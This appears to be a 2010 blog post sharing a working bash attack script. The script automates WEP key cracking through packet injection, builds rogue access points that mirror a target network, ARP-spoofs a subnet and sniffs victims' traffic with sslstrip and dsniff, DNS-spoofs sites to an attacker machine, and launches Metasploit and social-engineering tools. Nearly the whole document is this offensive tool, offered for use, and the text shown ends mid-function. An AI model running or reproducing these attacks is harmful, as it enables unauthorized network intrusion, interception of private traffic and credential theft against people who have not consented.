This is a work in Progress....
NEED A HINT.... http://vimeo.com/13245482 Just the beginning...
Last Update 11-9-10 Check back for updates...
Currently you can..
1. Create a Rogue AP and either sniff or attack it ... ...NEW after you crack wep you can mirror the wep encrypted AP.. endless possibilities... not tested.. only theory at this point...
2. Sniff or Attack your local subnet
3. Crack WEP (there are a lot of WEP attacks but I don't believe I have them all complete, so feel free to help with them, I have the basic layout done though) :)
4. Update some of the tools used in this script.
I notice the code is kind of screwed up on here. Not sure what to do about that.... If you know, comment :)
Comment on what you would like to see added to this, or any bugs you find.
If you need a tutorial on how to use this, please ask and I shall create!
TODO: ALOT... haha...
#!/bin/bash clear echo "******************************************************************"; echo "* WeLcOmE tO sLiPpErY's H4X0R tOoL rEv 0.1 *"; echo "* TeStEd WiTh BackTrack 4 R1 aNd rOgUe Ap TeStEd WiTh rt73usb! *"; echo "* FeEl FrEe To EdIt ThIs FiLe As ToU wIsH! *"; echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To slippery@shellium.org *"; echo "******************************************************************"; echo # WEP Crack setup function wepcrack(){ clear; echo "******************************************************************"; echo "*********************Time to H4X0R some WEP!!*********************"; echo "******************************************************************"; echo "Checking if the correct programs are installed.........."; type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed. Abort.";} type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} echo "******************************************************************"; echo "Killing old processes if they exist"; airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!! killall -q aircrack-ng airodump-ng aireplay-ng xterm &>/dev/null; # Should kill all programs that may interfere with this script echo "******************************************************************"; echo "Enter the interface used to H4X0R with (Ex. wlan0, wlan1)"; read WIFACE; echo "Using "$WIFACE" to H4X0R with"; ifconfig "$WIFACE" up; echo "******************************************************************"; airmon-ng start "$WIFACE" &>/dev/null; MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use. echo "Using "$MIFACE" as your monitor interface"; echo "******************************************************************"; xterm -hold -bg black -fg blue -T "Scanning networks" -geometry 90x20 -e airodump-ng "$MIFACE" -t wep &>/dev/null & # Scans for local WiFi networks echo "You should see a new window with local WEP networks"; echo "******************************************************************"; echo "Enter the name of an AP to H4X0R"; read ESSID; echo "******************************************************************"; echo "Enter the channel "$ESSID" is using"; read CHAN; echo "******************************************************************"; echo "Enter the MAC of "$ESSID""; read BSSID; echo "******************************************************************"; echo "If there is a client connected to "$ESSID" please type their MAC or just press enter"; read CLIENTMAC; echo "******************************************************************"; echo ""$ESSID"'s MAC is "$BSSID" and is using channel "$CHAN""; echo "******************************************************************"; echo "Enter the MAC you want to use for "$MIFACE" (Ex: 0A:1B:2C:3D:4E:5F)"; read MAC; echo "******************************************************************"; echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE""; echo airmon-ng stop "$MIFACE" &>/dev/null; airmon-ng stop "$WIFACE" &>/dev/null; ifconfig "$WIFACE" down; ifconfig "$WIFACE" up; airmon-ng start "$WIFACE" "$CHAN" &>/dev/null; ifconfig "$MIFACE" down; sleep 2; macchanger -m "$MAC" "$MIFACE"; sleep 1; ifconfig "$MIFACE" up; modprobe tun; sleep 1; killall -q airodump-ng xterm &>/dev/null; sleep 1; echo "******************************************************************"; echo "Testing "$MIFACE" for injection"; xterm -hold -bg black -fg blue -T "Injection Test" -geometry 90x20 -e aireplay-ng -9 -e "$ESSID" -b "$BSSID" "$MIFACE" &>/dev/null & sleep 5; killall -q aireplay-ng xterm &>/dev/null; sleep 2; clear; wepattackmenu; } #Captures IV's and saves them to h4x0r.cap function capture(){ echo "******************************************************************"; rm h4x0r.cap-*; sleep 2; echo "Starting to capture IV's from "$ESSID""; xterm -hold -bg black -fg blue -T "Capturing IV's" -geometry 90x20 -e airodump-ng -c $CHAN --bssid "$BSSID" -w h4x0r.cap "$MIFACE" &>/dev/null & sleep 5; } function associate(){ echo "******************************************************************"; echo "Trying to associate with "$ESSID""; xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & #For Picky AP's uncomment below and comment the above... #xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 30 -q 10 -o 1 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function injectarpclientless(){ echo "******************************************************************"; echo "Injecting ARP packets into "$ESSID""; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function injectarpclient(){ echo "******************************************************************"; echo "Injecting Client ARP packets into "$ESSID""; #xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -d FF:FF:FF:FF:FF:FF -m 68 -n 86 -t 1 -f 1 "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function randomarpclientless(){ echo "******************************************************************"; echo "Injecting a random ARP packet into "$ESSID""; xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$MAC" -r replay*.cap "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function randomarpclient(){ echo "******************************************************************"; echo "Injecting a random ARP packet into "$ESSID""; xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$CLIENTMAC" -r replay*.cap "$MIFACE" &>/dev/null & xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function fragclientless(){ echo "******************************************************************"; echo "Starting fragmenation attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function fragclient(){ echo "******************************************************************"; echo "Starting fragmenation attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function chopchopclientless(){ echo "******************************************************************"; echo "Starting chop chop attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null & sleep 5; } function chopchopclient(){ echo "******************************************************************"; echo "Starting chop chop attack against "$ESSID""; xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null & sleep 5; } function injectcapturedarpcleintless(){ echo "******************************************************************"; echo "Injecting the created ARP packet"; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$MAC" -r h4x0r-arp "$MIFACE" &>/dev/null & sleep 5; } function injectcapturedarpcleint(){ echo "******************************************************************"; echo "Injecting the created ARP packet"; xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$CLIENTMAC" -r h4x0r-arp "$MIFACE" &>/dev/null & sleep 5; } function xorfragclientless(){ packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp sleep 5; } function xorfragclient(){ packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp sleep 5; } function xorchopchopclientless(){ packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp sleep 5; } function xorchopchopclient(){ packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp sleep 5; } #Cracks the key.... function crackkey(){ echo "******************************************************************"; read -p "Hit Enter when you have 10,000 IV's, could take up to 5 min."; echo "******************************************************************"; echo "Starting to H4X0R the WEP key.................."; xterm -hold -bg black -fg blue -T "Cracking" -e aircrack-ng -b "$BSSID" h4x0r*.cap &>/dev/null & sleep 1; echo "******************************************************************"; echo "You should see the WEP key soon......"; echo "******************************************************************"; exit 0 } #Defines the type of attack to crack WEP function wepattackmenu(){ clear; echo "******************************************************************"; echo "**************Please select the type of attack below**************"; echo "THIS WILL DELETE ANY PREVIOUS h4x0r.cap* FILE RENAME IT TO KEEP IT"; echo "******************************************************************"; showMenu () { echo echo "1) ARP request replay attack (clientless)" echo "2) NOT TESTED Fragmentation (clientless)" echo "3) NOT TESTED Chop Chop (clientless)" echo "3) NOT TESTED ARP request replay attack (client)" echo "4) NOT TESTED Fragmentation (Client)" echo "5) NOT TESTED Chop Chop (client)" } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "ARP request replay attack (clientless)"; capture; associate; injectarpclientless; crackkey; ;; "2") echo "Fragmentation (clientless)"; capture; associate; fragclientless; xorfragclientless; injectcapturedarpcleintless; crackkey; ;; "3") echo "Chop Chop (clientless)" capture; associate; chopchopclientless; xorchopchopclientless; injectcapturedarpcleintless; crackkey; ;; "4") echo "ARP request replay attack (client)"; capture; associate; injectarpclientless; injectarpclient; crackkey; ;; "5") echo "Fragmentation (Client)"; capture; fragclient; xorfragclient; injectcapturedarpcleint; crackkey; ;; "6") echo "Chop Chop (client)"; capture; chopchopclient; xorchopchopclient; injectcapturedarpcleintless; crackkey; ;; esac done } # Script to gain information about your subnet and H4X0R it! function subnetscript(){ clear; echo "******************************************************************"; echo "Checking if the correct programs are installed.........."; type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P iptables &>/dev/null || { echo "I require iptables but it's not installed. Abort.";} type -P ettercap &>/dev/null || { echo "I require ettercap but it's not installed.";} type -P arpspoof &>/dev/null || { echo "I require arpspoof but it's not installed.";} type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";} type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";} type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";} type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";} type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";} locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";} locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";} locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";} echo "******************************************************************"; echo "Activating IP Forwarding and killing old H4X0R processes if they exist"; echo "******************************************************************"; echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script"; killall -q ettercap arpspoof sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script iptables --flush; # Makes sure your iptables are clear iptables --table nat --flush; # Makes sure your iptables are clear iptables --delete-chain; # Makes sure your iptables are clear iptables --table nat --delete-chain; # Makes sure your iptables are clear echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding echo "******************************************************************"; IFACE=`ip route | awk '{print $3}' | sed q`; # Finds your interface echo "Using "$IFACE" as your internet connected interface"; echo "******************************************************************"; IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP echo "Using "$IFACEIP" as your IP address for "$IFACE""; echo "******************************************************************"; GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP echo "Using "$GW" for the Gateway address for "$IFACE""; echo "******************************************************************"; SUBNET=`ip route | awk '{print $1}' | sed q` # Finds your subnet echo "Using "$SUBNET" as as the subet to H4X0R"; echo "******************************************************************"; echo "Enter a MAC address to use, Ex: 0A:1B:2C:3D:4E:5F or hit enter to leave your MAC alone"; read MAC; echo "using "$MAC" for your MAC address"; echo "******************************************************************"; echo "Restarting and changing the MAC address to "$MAC" on "$IFACE""; ifconfig "$IFACE" down; sleep 2; macchanger -m "$MAC" "$IFACE"; ifconfig "$IFACE" up; modprobe tun; echo "******************************************************************"; arpsetup; qsubnet; } # Arpspoof Setup for subnet function arpsetup(){ clear; echo "******************************************************************"; echo "Do you want to arpspoof one client or all clients on the subnet of "$SUBNET"? (one or all) Note: webspy only works with one client!"; read SNIFFING; echo "******************************************************************"; if [ "$SNIFFING" == "all" ];then arpspoof -i "$IFACE" "$GW" &>/dev/null & elif [ "$SNIFFING" == "one" ];then xterm -hold -bg black -fg blue -T "netdiscover" -e netdiscover -i "$IFACE" -r "$SUBNET" &>/dev/null & echo "******************************************************************"; echo "Enter the victim's IP from the 'netdiscover' window"; read CLIENT; echo "arpspoofing "$CLIENT" only"; echo "******************************************************************"; arpspoof -i "$IFACE" -t "$GW" "$CLIENT" &>/dev/null & arpspoof -i "$IFACE" -t "$CLIENT" "$GW" &>/dev/null & else echo "******************************************************************"; echo "Enter 'one' or 'all' only!!!"; exit 0 fi iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080; } # DNS Spoof setup for subnet function dnsspoof(){ clear; iptables --table nat --flush; # clears the way for attacks... echo "******************************************************************"; echo "You can run this over and over if you need to change DNS spoofing"; echo "******************************************************************"; if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; echo "Uncommented your iptables in /etc/etter.conf for you :)"; fi killall -q ettercap &>/dev/null & echo "Enter a website you want to dns spoof (Ex. '*.google.com' or '*' for all sites)"; read DNSADDY; echo "Every time a victim tries to connect to "$DNSADDY" they will be forwarded to "$IFACEIP""; echo "******************************************************************"; echo ""$DNSADDY" A "$IFACEIP"" > /usr/share/ettercap/etter.dns xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" -P dns_spoof /"$CLIENT"/ /"$GW"/ &>/dev/null & #sudo ettercap -G &>/dev/null & sleep 5; } # Attack Menu for subnet function attacksn(){ clear; echo "******************************************************************"; echo "Launch DNS Spoof after your tools are setup!"; echo "******************************************************************"; showMenu () { echo echo "1) SimpleHTTPServer port 80" echo "2) Social Engineering Toolkit" echo "3) Metasploit" echo "4) Fast-Track" echo "5) Add your own tool" echo "6) Launch DNS Spoof" echo "7) Exit and cleanup" echo "8) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up SimpleHTTPServer on port 80 in "$PWD""; xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null & ;; "2") echo "Setting up Social Engineering Toolkit"; cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null & ;; "3") echo "Setting up Metasploit........."; cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null & sleep 2; echo "Few more seconds......"; ;; "4") echo "Setting up Fast-Track"; cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null & ;; "5") echo "******************************************************************"; echo "What other attacks are you planning? Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "6") dnsspoof; ;; "7") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } # Sniff menu for subnet function sniffsn(){ clear; echo "******************************************************************"; echo "Checking to see if your ready to run ettercap..."; echo "******************************************************************"; if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; echo "Uncommented your iptables in /etc/etter.conf for you :)"; fi killall -q ettercap &>/dev/null & xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" /"$CLIENT"/ /"$GW"/ &>/dev/null & #sudo ettercap -G &>/dev/null & sleep 7; clear; echo "If ettercap is now sniffing then startup some other fun tools"; echo "******************************************************************"; showMenu () { echo echo "1) sslstrip" echo "2) driftnet" echo "3) urlsnarf" echo "4) dsniff" echo "5) webspy (Only if you slected one client)" echo "6) Add your own tool" echo "7) Stop sniffing and start attacking" echo "8) Exit and cleanup" echo "9) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up sslstrip"; xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null & sleep 1; xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null & ;; "2") echo "Setting up driftnet"; xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i "$IFACE" &>/dev/null & ;; "3") echo "Setting up urlsnarf"; xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i "$IFACE" &>/dev/null & ;; "4") echo "Setting up dsniff"; xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i "$IFACE" -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null & ;; "5") echo "Setting up webspy"; xterm -bg black -fg blue -T "webspy" -e webspy -i "$IFACE" "$CLIENT" &>/dev/null & sleep 2; mozilla & ;; "6") echo "******************************************************************"; echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "7") attackmenu; ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "9") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } # Defines if you want to sniff or attack the subnet function qsubnet(){ clear; echo "Do you want to sniff or attack the subnet of "$SUBNET"? (sniff or attack)"; read SN; if [ "$SN" == "sniff" ];then sniffsn; elif [ "$SN" == "attack" ];then attacksn; else echo "******************************************************************"; echo "Enter 'sniff' or 'attack' only!!!"; exit 0 fi } # Script to gain information to create a Rogue AP! function rogueapscript(){ clear; echo "******************************************************************"; echo "!!! Make sure the interface used to create the Rogue AP is connected before running this script, and that you are connected to the internet with a different interface !!!"; echo echo "Checking if the correct programs are installed.........."; type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed. Abort.";} type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed. Abort.";} type -P xterm &>/dev/null || { echo "I require xterm but it's not installed. Abort.";} type -P iptables &>/dev/null || { echo "I require iptables but it's not installed. Abort.";} type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";} type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";} type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";} type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";} type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";} type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";} type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";} type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";} locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";} locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";} locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";} echo "******************************************************************"; echo "Activating IP Forwarding and killing old Rogue AP processes if they exist"; echo "******************************************************************"; echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script"; airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!! killall -q dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script iptables --flush; # Makes sure your iptables are clear iptables --table nat --flush; # Makes sure your iptables are clear iptables --delete-chain; # Makes sure your iptables are clear iptables --table nat --delete-chain; # Makes sure your iptables are clear echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding echo "******************************************************************"; IFACE=`ip route | awk '{print $3}' | sed q`; # Finds your interface echo "Using "$IFACE" as your internet connected interface"; echo "******************************************************************"; IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP echo "Using "$IFACEIP" as your IP address for "$IFACE""; echo "******************************************************************"; GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP echo "Using "$GW" for the Gateway address for "$IFACE""; echo "******************************************************************"; echo "Enter the Interface used to create the Rogue AP (Ex. wlan0, wlan1)"; read WIFACE; echo "Using "$WIFACE" to create the Rouge AP"; ifconfig "$WIFACE" up; echo "******************************************************************"; airmon-ng start "$WIFACE" &>/dev/null; MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected Rogue AP interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use. echo "Using "$MIFACE" as your monitor interface"; echo "******************************************************************"; iwlist "$WIFACE" scan | grep -E 'Address:|Channel:|ESSID:'; # Scans for local WiFi networks echo echo "^^^Above are some local WiFi networks^^^"; echo "******************************************************************"; echo "Enter the name of your Rogue AP"; read AP; echo "Using "$AP" for Rogue AP name"; echo "******************************************************************"; echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)"; read CH; echo "Using "$CH" for Rogue AP channel"; echo "******************************************************************"; echo "Enter the MAC for your Rogue AP (Ex: 0A:1B:2C:3D:4E:5F)"; read MAC; echo "Using "$MAC" for Rogue AP MAC address"; echo "******************************************************************"; echo "Select your MTU setting (1400, 1500 or maybe 1800??)"; read MTU; echo "Using "$MTU", If you have problems try a different setting"; echo "******************************************************************"; echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE""; airmon-ng stop "$MIFACE" &>/dev/null; airmon-ng stop "$WIFACE" &>/dev/null; ifconfig "$WIFACE" down; ifconfig "$WIFACE" up; airmon-ng start "$WIFACE" &>/dev/null; ifconfig "$MIFACE" down; sleep 2; macchanger -m "$MAC" "$MIFACE"; ifconfig "$MIFACE" up; modprobe tun; echo "******************************************************************"; echo "Testing "$MIFACE" for injection"; xterm -hold -bg black -fg blue -T "Injection Test" -e aireplay-ng --test "$MIFACE" &>/dev/null & sleep 7; killall -q aireplay-ng; echo "******************************************************************"; qrogueap; } #Sends you to the correct function if your copying someone's AP function mirror(){ echo "Are you mirroring "$AP", and do they have WEP encryption? (yes or no)"; read WEP; if [ "$WEP" == "yes" ];then echo "Enter their WEP key now"; read WEPKEY; echo "Using "$WEPKEY" for "$AP"'s WEP key"; weprogueap; elif [ "$WEP" == "no" ];then rogueap; else echo "******************************************************************"; echo "Enter 'yes' or 'no' only!!!"; exit 0 fi } #Creates the Rogue AP function rogueap(){ clear; echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)"; read CON; if [ "$CON" == "let" ];then echo "******************************************************************"; echo "Building your "$AP" Rogue AP...."; xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null & echo "******************************************************************"; echo "Letting the clients connect to "$AP""; elif [ "$CON" == "help" ];then echo "******************************************************************"; echo "Building your "$AP" Rogue AP...."; xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null & echo "******************************************************************"; echo "Helping clients to connect to "$AP""; else echo "******************************************************************"; echo "Enter 'let' or 'help' only!!!"; exit 0 fi echo "******************************************************************"; echo "Waiting a few seconds for "$AP" to be established"; sleep 5; apsetup; } #Creates the Rogue AP with WEP encryption function weprogueap(){ clear; echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)"; read CON; if [ "$CON" == "let" ];then echo "******************************************************************"; echo "Building your "$AP" Rogue AP...."; xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null & echo "******************************************************************"; echo "Letting the clients connect to "$AP""; elif [ "$CON" == "help" ];then echo "******************************************************************"; echo "Building your "$AP" Rogue AP...."; xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null & echo "******************************************************************"; echo "Helping clients to connect to "$AP""; else echo "******************************************************************"; echo "Enter 'let' or 'help' only!!!"; exit 0 fi echo "******************************************************************"; echo "Waiting a few seconds for "$AP" to be established"; sleep 5; apsetup; } # Sets up your Rogues AP's iptables and dhcp server function apsetup(){ ifconfig at0 up; ifconfig at0 mtu "$MTU"; ifconfig at0 10.0.0.1 netmask 255.255.255.0; route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1; echo "******************************************************************"; echo ""$AP" should be running now!"; echo "******************************************************************"; echo "Setting up the iptables"; iptables -P FORWARD ACCEPT; iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE; iptables --append FORWARD --in-interface at0 -j ACCEPT; if [ "$DO" == "sniff" ];then iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080; elif [ "$DO" == "attack" ];then iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"; else echo "******************************************************************"; echo "Enter 'sniff' or 'attack' only!!!"; exit 0 fi echo "******************************************************************"; echo "Setting up the DHCP server and running it"; echo "******************************************************************"; echo "ddns-update-style none;" > /etc/dhcp3/dhcpd.conf echo "authoritative;" >> /etc/dhcp3/dhcpd.conf echo "default-lease-time 600;" >> /etc/dhcp3/dhcpd.conf echo "max-lease-time 7200;" >> /etc/dhcp3/dhcpd.conf echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf echo "option subnet-mask 255.255.255.0;" >> /etc/dhcp3/dhcpd.conf echo "option broadcast-address 10.0.0.255;" >> /etc/dhcp3/dhcpd.conf echo "option domain-name-servers "$GW";" >> /etc/dhcp3/dhcpd.conf echo "range 10.0.0.10 10.0.0.20;" >> /etc/dhcp3/dhcpd.conf echo "}" >> /etc/dhcp3/dhcpd.conf; mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd; echo > /var/lib/dhcp3/dhcpd.leases; xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null & echo "Launching DHCP entries log"; xterm -bg black -fg blue -T "DHCP log" -e tail -f /var/log/messages 